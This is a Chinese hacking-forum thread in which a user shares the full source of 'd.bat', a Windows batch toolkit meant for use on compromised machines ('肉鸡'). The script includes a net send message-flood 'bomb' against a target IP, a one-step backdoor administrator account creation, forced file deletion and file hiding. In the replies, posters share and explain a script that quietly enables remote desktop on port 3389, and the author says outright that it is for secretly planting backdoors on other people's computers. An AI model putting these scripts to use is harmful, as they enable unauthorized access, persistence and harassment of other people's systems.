20CN网络安全小组论坛 - 黑客进阶 - 我的程序没人看伤心中

论坛: 黑客进阶标题: 我的程序没人看伤心中

作者: allyesno [allyesno]

论坛用户

一款在本机或者肉鸡上使用的批处理程序

加入了许多常用的命令更方便大家的“工作”

内置了即时的帮助
===============================================================================
a是通过计算机名查看对方信息
A是通过ip地址查看对方信息
b是Win2000 XP消息炸弹
c是color改变颜色  color bf (b是背景，f是前台)
0 = 黑色       8 = 灰色
1 = 蓝色       9 = 淡蓝色
2 = 绿色       A = 淡绿色
3 = 浅绿色     B = 淡浅绿色
4 = 红色       C = 淡红色
5 = 紫色       D = 淡紫色
6 = 黄色       E = 淡黄色
7 = 白色       F = 亮白色
d是删除指定文件或者文件夹
def是查看当前文件和文件夹状态(既是你什么也不用输入)
e是即时编写文件
g是隐藏指定文件
G是解除指定的隐藏文件
h是帮助
i是显示当前ip状态和网卡状态
n是查询当前端口状态以及列出危险端口和常用端口
o是快速增加系统管理员
O是快速删除系统管理员(O是英文字母o的大小不是数字0)
p是将目录加载进path
s是在当前盘搜索指定文件
t是查看指定文件的内容
w是telnet登陆远程主机
================================================================

以下是源代码

================================================================
@echo off
rem Readme--------------------------------------------------------------------------------------------------------------------

rem abcdefghijklmnopqrstuvwxyz

rem ver2.0

rem a是nbtstat -a 计算机名命令

rem A是nbtstat -A ip地址命令

rem b是net send 炸弹

rem c是color改变颜色  color bf (b是背景，f是前台)
rem 0 = 黑色       8 = 灰色
rem 1 = 蓝色       9 = 淡蓝色
rem 2 = 绿色       a = 淡绿色
rem 3 = 浅绿色     b = 淡浅绿色
rem 4 = 红色       c = 淡红色
rem 5 = 紫色       d = 淡紫色
rem 6 = 黄色       e = 淡黄色
rem 7 = 白色       f = 亮白色

rem d是删除指定文件夹

rem def是查看当前文件or文件夹状态

rem e是即时编写文件

rem g是改变指定文件的属性(用来隐藏文件，加强文件的保密性)

rem G是改变指定文件的属性(用来解除隐藏文件)

rem h是帮助

rem i是incongfig/all显示当前ip状态

rem n是netstat -na 查询当前端口状态以及列出危险端口

rem o是快速增加系统管理员

rem O是快速删除系统管理员(O是英文字母o的大小不是数字0)

rem p是将目录加载进path

rem s是在当前盘搜索指定文件

rem t是查看指定文件的内容

rem w是telnet登陆远程主机主机

rem about是我想要说的话我要感谢的人我将来的计划我的联系地址

rem SYSTEM START--------------------------------------------------------------------------------------------------------------

rem IF-----------------------------------------------------------------------------------------------------------------------
cls
if "%1"=="" goto def
if "%1"=="a" goto a
if "%1"=="A" goto Ax
if /i "%1"=="b" goto bomb
if /i "%1"=="c" goto color
if /i "%1"=="d" goto deltree
if /i "%1"=="e" goto edit
if "%1"=="g" goto attrib+
if "%1"=="G" goto attrib-
if /i "%1"=="h" goto help
if /i "%1"=="i" goto ipconfig
if /i "%1"=="n" goto netstat
if "%1"=="o" goto op
if "%1"=="O" goto opx
if /i "%1"=="p" goto path
if /i "%1"=="s" goto search
if /i "%1"=="t" goto type
if /i "%1"=="w" goto wtelnet
if "%1"=="?" goto help
if /i "%1"=="about" goto about
goto error
rem p start------------------------------------------------------------------------------------------------------------------
:def
cls
dir/w/p
goto thank
:a
if "%2"=="" goto cnlose
echo 远程主机的计算机名称为 %2
nbtstat -a %2
goto thank
:attrib+
if "%2"=="" goto attrib+lose
attrib +H +S +R %2
goto thank
:attrib-
if "%2"=="" goto attrib-lose
attrib -H -S -R %2
goto thank
:Ax
if "%2"=="" goto Aiplose
echo 远程主机的ip地址为     %2
nbtstat -A %2
goto thank
:bomb
if "%2"=="" goto bomberror
if "%3"=="" goto bomberror
if "%4"=="" goto bomberror
echo 你输入的轰炸次数是 %2
echo 你要轰炸的ip地址是 %3
echo 你输入的轰炸信息是 %4
for /l %%i in (1,1,%2) do echo 第%%i次轰炸&&net send %3 %4&if errorlevel 1 goto thank
goto thank
:color
color
if "%2"=="" goto colorlose
color %2
goto thank
:edit
if "%2"=="" goto editfnlose
echo 请记住编写完文件后请按『CTRL+Z』再按回车结束文件编写
echo 请开始编写文件  你现在编写的文件是 %2
echo ★☆★☆★☆★☆★☆★☆★☆★☆★写你想写☆★☆★☆★☆★☆★☆★☆★☆★☆★
copy con %2
d t %2
goto thank
:deltree
if "%2"=="" goto dfnlose
attrib -h -s -r %2
if exist %2\nul goto deltree2
if exist %2 goto deltree1
echo 没有这个文件或者目录存在
goto thank
:deltree1
echo 你要删除的文件是 %2
del/f/q %2
echo.>%2
del/f/q %2
md %2
rd/s/q %2
echo.>%2
del/f/q %2
md %2
rd/s/q %2
echo 文件已经安全删除
goto thank
:deltree2
echo 你要删除的目录是 %2
rd/s/q %2
echo.>%2
del/f/q %2
md %2
rd/s/q %2
echo.>%2
del/f/q %2
md %2
rd/s/q %2
echo 目录已经安全删除
goto thank
:help
echo a是通过计算机名查看对方信息
echo A是通过ip地址查看对方信息
echo b是Win2000 XP消息炸弹
echo c是color改变颜色  color bf (b是背景，f是前台)
echo 0 = 黑色       8 = 灰色
echo 1 = 蓝色       9 = 淡蓝色
echo 2 = 绿色       A = 淡绿色
echo 3 = 浅绿色     B = 淡浅绿色
echo 4 = 红色       C = 淡红色
echo 5 = 紫色       D = 淡紫色
echo 6 = 黄色       E = 淡黄色
echo 7 = 白色       F = 亮白色
echo d是删除指定文件或者文件夹
echo def是查看当前文件和文件夹状态(既是你什么也不用输入)
echo e是即时编写文件
echo g是隐藏指定文件
echo G是解除指定的隐藏文件
echo h是帮助
echo i是显示当前ip状态和网卡状态
echo n是查询当前端口状态以及列出危险端口和常用端口
echo 请按空格键或者任意键~~~~~~
pause>nul
echo o是快速增加系统管理员
echo O是快速删除系统管理员(O是英文字母o的大小不是数字0)
echo p是将目录加载进path
echo s是在当前盘搜索指定文件
echo t是查看指定文件的内容
echo w是telnet登陆远程主机
echo 请按空格键或者任意键继续~~~~~~
pause>nul
goto thank
:ipconfig
ipconfig/all
goto thank
:netstat
netstat -na
echo 请按空格键或者任意键~~~~~~~~
pause>nul
echo.
echo 本机已经开启的常用及危险端口
echo.
netstat -na|find ":21">nul&&if errorlevel 0 echo 端口:21 FTP服务
netstat -na|find ":23">nul&&if errorlevel 0 echo 端口:23 远程登录服务
netstat -na|find ":25">nul&&if errorlevel 0 echo 端口:25 电子邮件(SMTP)
netstat -na|find ":53">nul&&if errorlevel 0 echo 端口:53 Domain Name Server(DNS)
netstat -na|find ":80">nul&&if errorlevel 0 echo 端口:80 http
netstat -na|find ":110">nul&&if errorlevel 0 echo 端口:110 电子邮件(Pop3)
netstat -na|find ":135">nul&&if errorlevel 0 echo 端口:135 Location Service(DCOM)
netstat -na|find ":137">nul&&if errorlevel 0 echo 端口:137 NETBIOS Name Service(UDP)
netstat -na|find ":138">nul&&if errorlevel 0 echo 端口:138 NETBIOS Name Service(UDP)
netstat -na|find ":139">nul&&if errorlevel 0 echo 端口:139 NETBIOS Name Service
netstat -na|find ":445">nul&&if errorlevel 0 echo 端口:445 Microsoft-DS
netstat -na|find ":1080">nul&&if errorlevel 0 echo 端口:1080 WWW 代理
netstat -na|find ":1433">nul&&if errorlevel 0 echo 端口:1433 SQL SERVER
netstat -na|find ":3389">nul&&if errorlevel 0 echo 端口:3389 终端服务
netstat -na|find ":4000">nul&&if errorlevel 0 echo 端口:4000 腾讯QQ客户端
netstat -na|find ":4590">nul&&if errorlevel 0 echo 端口:4590 木马－ICQTrojan
netstat -na|find ":4950">nul&&if errorlevel 0 echo 端口:4950 木马－ICQTrojan
netstat -na|find ":5000">nul&&if errorlevel 0 echo 端口:5000 WindowsXP服务器
netstat -na|find ":5190">nul&&if errorlevel 0 echo 端口:5190 ICQ
netstat -na|find ":5631">nul&&if errorlevel 0 echo 端口:5631 PcanyWhere
netstat -na|find ":5632">nul&&if errorlevel 0 echo 端口:5632 PcanyWhere
netstat -na|find ":5800">nul&&if errorlevel 0 echo 端口:5800 VNC
netstat -na|find ":5900">nul&&if errorlevel 0 echo 端口:5900 VNC
netstat -na|find ":6267">nul&&if errorlevel 0 echo 端口:6267 木马－广外女生
netstat -na|find ":7323">nul&&if errorlevel 0 echo 端口:7323 Sygate服务
netstat -na|find ":7626">nul&&if errorlevel 0 echo 端口:7626 木马－冰河
netstat -na|find ":8000">nul&&if errorlevel 0 echo 端口:8000 腾讯QQ服务器端
netstat -na|find ":8010">nul&&if errorlevel 0 echo 端口:8010 Wingate代理
netstat -na|find ":8080">nul&&if errorlevel 0 echo 端口:8080 WWW 代理
netstat -na|find ":52013">nul&&if errorlevel 0 echo 端口:52013 木马－灰鸽子
netstat -na|find ":52014">nul&&if errorlevel 0 echo 端口:52014 木马－灰鸽子
netstat -na|find ":52015">nul&&if errorlevel 0 echo 端口:52015 木马－灰鸽子
echo.
goto thank
:op
if "%2"=="" goto opnlose
if "%3"=="" goto opplose
echo 你要添加的管理员名称为 %2
echo 你要添加的管理员密码为 %3
echo.
net user %2 %3 /add
net localgroup administrators %2 /add
echo 添加完毕
goto thank
:opx
if "%2"=="" goto opxnlose
echo 你要删除的管理员名称为 %2
echo.
net user %2 /delete
echo 删除完毕
goto thank
:path
if "%2"=="" goto pathlose
path=%2;%path%
goto thank
:search
if "%2"=="" goto sfnlose
cd\>nul
dir/s/p %2
goto thank
:type
if "%2"=="" goto tfnlose
type %2|more
goto thank
:wtelnet
if "%2"=="" goto wtelnetlose
if "%3"=="" goto wtelnetplose
echo 你要远程登陆的主机是 %2
echo 远程主机端口是       %3
echo 请稍后~~~~~~~~
echo.
telnet %2 %3
goto thank
rem HELP--------------------------------------------------------------------------------------------------------------------------
:cnlose
echo 你没有输入计算机名称
echo 用法:d a 计算机名称
echo 例子:d a MSHOME
goto thank
:attrib+lose
echo 你没有输入要隐藏的文件名
echo 用法:d g 文件名
echo 例子:d g hack.exe
goto thank
:attrib-lose
echo 你没有输入要解除隐藏的文件名
echo 用法:d G 文件名
echo 例子:d G hack.exe
goto thank
:Aiplose
echo 你没有输入 ip地址
echo 用法:d A ip地址
echo 例子:d A 192.168.9.18
goto thank
:bomberror
echo 你没有输入轰炸次数 or ip地址 or 轰炸信息
echo 用法:d b 轰炸次数 ip地址轰炸信息
echo 例子:d b 174 192.168.9.18 hi
goto thank
:colorlose
echo 你没有输入背景or前景的参数
echo 用法:d c 背景前景(0-9,A-F)
echo 0 = 黑色       8 = 灰色
echo 1 = 蓝色       9 = 淡蓝色
echo 2 = 绿色       a = 淡绿色
echo 3 = 浅绿色     b = 淡浅绿
echo 4 = 红色       c = 淡红色
echo 5 = 紫色       d = 淡紫色
echo 6 = 黄色       e = 淡黄色
echo 7 = 白色       f = 亮白色
echo 例子:d c 8a
echo 注意:输入d c 时将恢复默认颜色
goto thank
:dfnlose
echo 你没有输入要删除的文件or文件夹名称
echo 用法:d d 文件or文件夹名称【注意:是强制性删除,请慎重使用】
echo 例子:d d hack.exe
echo 例子:d d c:\windows
goto thank
:editfnlose
echo 你没有输入要编写的文件名称
echo 用法:d e 文件名称【注意:这种编辑是重新建立一个文件如果
echo 你指定了一个存在的文件名那么该指令会覆盖旧的文件】
echo 例子:d e cat.asp
goto thank
:opnlose
echo 你没有输入要添加的管理员名称
echo 用法:d o 管理员名称管理员密码
echo 例子:d o hack 3389
goto thank
:opplose
echo 你没有输入要添加的管理员密码
echo 用法:d o 管理员名称管理员密码
echo 例子:d o hack 3389
goto thank
:opxnlose
echo 你没有输入要删除的管理员名称
echo 用法:d O 管理员名称
echo 例子:d O hack
echo 注意:O是英文o的大写而不是数字0
goto thank
:pathlose
echo 你没有输入要加载的目录名称
echo 用法:d p 目录名称
echo 例子:d p c:\bat
goto thank
:sfnlose
echo 你没有输入要搜索的文件名称
echo 用法:d s 文件名称
echo 例子:d s sam
goto thank
:tfnlose
echo 你没有输入要显示的文件名称
echo 用法:d t 文件名称
echo 例子:d t winpass.dll
goto thank
:wtelnetlose
echo 你没有输入远程主机的ip
echo 用法:d w 远程主机的ip
echo 例子:d w 192.168.9.18 12345
goto thank
:wtelnetplose
echo 你没有输入远程主机的端口
echo 用法:d w 远程主机的ip
echo 例子:d w 192.168.9.18 12345
goto thank
:about
echo ThankX:为我的动画教程和程序提供下载空间的『小凤居』;参考了一部分代码的QQ黑市的
echo.
echo 梦想黑客(D-HYH);我永远的好朋友电脑诊所的老猫(我想你了：）);教我学会搜索的电脑
echo.
echo 诊所的babycat;周杰伦(你的歌让写程序时我没那么无聊);特别感谢我的家人(他们赞助了
echo.
echo 两台电脑和三个显示器以及ADSL给我). 我常在 www.qbqb.com 混欢迎大家来玩
echo.
echo 另外，我不是什么黑客谢绝一切拜师以及挑战但是欢迎和你讨论一切有关电脑的问题
echo.
echo 请按空格键或者任意键继续~~~~~~~~~
pause>nul
goto thank
rem SYSTEM END--------------------------------------------------------------------------------------------------------------------------
:error
echo 你输入了不正确的参数
:thank
echo.
echo 键入d h or d ?获得帮助(或者键入d a;d A;d b;d e等亦可)
rem 关于d.bat程序的介绍，完全借助windows自带的程序编制的bat
rem (我正在努力的把它扩展成在WindowS最好的bat黑客工具)
rem made by cat
echo 注意:该程序必须在2000 或者 XP下使用 ; 谢谢使用cat的d.bat(v 2.0)加强命令!:)
echo 现在的时间是 %time% ; 今天是 %date%

地主发表时间: 08/19 22:05

回复: allyesno [allyesno]

论坛用户

现在正在编写3.0

B1层发表时间: 08/19 22:06

回复: jgplcgd [jgplcgd]

论坛用户

我替你顶！！！
顺便问一下：.
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
这是一个开3389的批处理，前两行我懂，第三行是什么意思呀？
还有，为什么加[Components]，TSEnable = on进入sql文件就可开3389了，sql是什么文件？

B2层发表时间: 08/20 03:34

回复: allyesno [allyesno]

论坛用户

回楼上的

你那个是开3389的脚本

第三行 sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

是在安静模式下开启3389

echo [Components] > c:\sql
echo TSEnable = on >> c:\sql

只是把指令写进sql这个文件里面

同样

echo [Components] > c:\hack
echo TSEnable = on >> c:\hack

sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\hack /q

也是可以的

B3层发表时间: 08/20 10:45

回复: ChadClarke [jgplcgd]

论坛用户

谢谢。但什么是安静模式？还有其他模式吗？有什么不同？

B4层发表时间: 08/20 20:54

回复: allyesno [allyesno]

论坛用户

安静就是偷偷的安装

谁会大张旗鼓的在别人的机子上装后门啊

B5层发表时间: 08/21 00:25